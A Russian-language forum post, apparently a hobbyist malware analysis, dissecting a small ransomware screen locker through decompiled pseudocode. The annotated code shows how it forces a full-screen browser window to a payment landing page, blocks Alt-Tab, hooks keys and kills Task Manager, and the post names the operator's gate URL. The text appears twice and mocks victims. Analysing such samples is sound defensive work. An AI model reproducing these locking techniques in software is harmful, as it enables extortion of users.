Делать в общем было нечего и я полез самизнаетекуда в поисках очередных ништяков гадких вирусов :shit:
Просматривая свежие посты с семплами, наткнулся на интересный локер с размером всего 3.5 Кб. Ого, до чего техника дошла, подумал я. Но внимание также привлек скрин:
Который я уже где-то видел...
Ну вот ирыба моей мечты свежий, недавно появившийся локер с прайсом в 1к американских рублей.
Небольшое описалово:
Функционал в принципе обычный, автор еще обещает кучу лендингов под разные страны:
Кое-где автор также упомянул, что лендинги тянутся с админки и показываются в окне браузера, который раскрывается на весь рабочий столи там корованы можно грабить.... Стало интересно, как оно все там сделано в 3.5 Кб
Спасибо Ильфаку, залучи счастья Hex-Rays и псевдокод
Семпл попался без крипта и прочих полиморфов. На OEP нас встречает такой код:
Из интересного:
- грузится atl.dll
- из нее вызывается AtlAxWinInit (для использования интерфейса IE без лишнего напряга) и если создать окно в таком формате CreateWindowEx(0, "AtlAxWin", "http://yandex.ru/" ...), то покажется окно браузера с открытой страницей Яндекса
- создается диалог с номером шаблона диалога 0x3E8 - "1000", который выглядет так:
Из вышесказанного становится понятно, что откроется браузер с адресом http://gateforback.info/escash/income.php, откуда будет загружен лендинг под конкретную страну (у меня открылся Bing, т.к админка локера уже редиректит на него или моя страна не входит в число профитовых)
- обработчик сообщений диалога
Вот в принципе и все, юзверь ловит лендинг и если лох - бежит за ваучером, вбивает его и ничего, возможно там показывается сообщение с просьбой перезагрузить комп, но никакого кода автозагрузки я не увидел, а может это нерезидентная версия локера.
з.ы.: а ALT-Space видимо не продумали, хе-хе...
з.з.ы.: сам семпл
Просматривая свежие посты с семплами, наткнулся на интересный локер с размером всего 3.5 Кб. Ого, до чего техника дошла, подумал я. Но внимание также привлек скрин:
Который я уже где-то видел...
Ну вот и
Небольшое описалово:
Функционал в принципе обычный, автор еще обещает кучу лендингов под разные страны:
Кое-где автор также упомянул, что лендинги тянутся с админки и показываются в окне браузера, который раскрывается на весь рабочий стол
Спасибо Ильфаку, за
Семпл попался без крипта и прочих полиморфов. На OEP нас встречает такой код:
Код:
v0 = LoadLibraryA("atl.dll");
hModule = v0;
v1 = GetProcAddress(v0, "AtlAxWinInit");
v1();
v2 = GetModuleHandleA(0);
CreateDialogParamA(v2, (LPCSTR)0x3E8, 0, DialogFunc, 0);
while ( GetMessageA(&Msg, 0, 0, 0) )
{
TranslateMessage(&Msg);
DispatchMessageA(&Msg);
}
v3 = FreeLibrary(hModule);
ExitProcess(v3);Из интересного:
- грузится atl.dll
- из нее вызывается AtlAxWinInit (для использования интерфейса IE без лишнего напряга) и если создать окно в таком формате CreateWindowEx(0, "AtlAxWin", "http://yandex.ru/" ...), то покажется окно браузера с открытой страницей Яндекса
- создается диалог с номером шаблона диалога 0x3E8 - "1000", который выглядет так:
Из вышесказанного становится понятно, что откроется браузер с адресом http://gateforback.info/escash/income.php, откуда будет загружен лендинг под конкретную страну (у меня открылся Bing, т.к админка локера уже редиректит на него или моя страна не входит в число профитовых)
- обработчик сообщений диалога
Код:
switch ( a2 ) //тип сообщения
{
case 0x110: //если WM_INITDIALOG - начало создания диалога
ShowWindow(hDlg, 3); //показываем диалог и раскрываем на весь экран
v4 = GetWindowLongA(hDlg, GWL_STYLE); //получаем стили диалога
SetWindowLongA(hDlg, GWL_STYLE, v4 & 0xFF3BFFFF); //убирает заголовок и прочие кнопки
v5 = GetWindowLongA(hDlg, GWL_EXSTYLE);
SetWindowLongA(hDlg, GWL_EXSTYLE, v5 | 0x80000);
SetLayeredWindowAttributes(hDlg, 0, 0xFFu, 2u); //отключает прозрачность
v6 = GetCurrentThreadId();
dword_402084 = (int)SetWindowsHookExA(2, fn, 0, v6); //обработчик клавиш
RegisterHotKey(0, 0x6Cu, 1u, 9u); //отключает ALT-TAB
SetWindowPos(hDlg, HWND_MESSAGE|0x2, 0, 0, 0, 0, 3u); //выносит окно диалога поверх всех окон
SetTimer(hDlg, 0x65u, 0x28u, 0); //запускает 40-мс таймер для следующего case
hWnd = hDlg;
SetForegroundWindow(hDlg); //на передний план
SetWindowPos(hWnd, 0, 0, 0, 0, 0, 3u); //и еще разочек для верности
break;
case 0x113: //если WM_TIMER - сработал таймер и выносим окно диалога поверх всех остальных окон, если оно еще не вынесено, тем самым скрываются различные меню браузера
SetForegroundWindow(hWnd);
SetWindowPos(hWnd, 0, 0, 0, 0, 0, 3u);
v7 = GetForegroundWindow();
if ( v7 != hWnd )
{
v10 = v7;
GetClassNameA(v7, String1, 30);
if ( !lstrcmpA(String1, "#32770") )
{
dword_402000 = (int)v10;
ShowWindow(v10, 0);
}
}
if ( !byte_402004 )
EnumWindows(EnumFunc, 0); //тут ищется окно виндового диспетчера задач и убивается через WM_ENDSESSION
break;
case 5: //если WM_SIZE - кто-то пытается изменить размеры окна, то обламывается
v8 = GetDlgItem(hDlg, 1001);
MoveWindow(v8, 0, 0, (unsigned __int16)a4, a4 >> 16, 1);
break;
}
return 0;
}Вот в принципе и все, юзверь ловит лендинг и если лох - бежит за ваучером, вбивает его и ничего, возможно там показывается сообщение с просьбой перезагрузить комп, но никакого кода автозагрузки я не увидел, а может это нерезидентная версия локера.
з.ы.: а ALT-Space видимо не продумали, хе-хе...
з.з.ы.: сам семпл
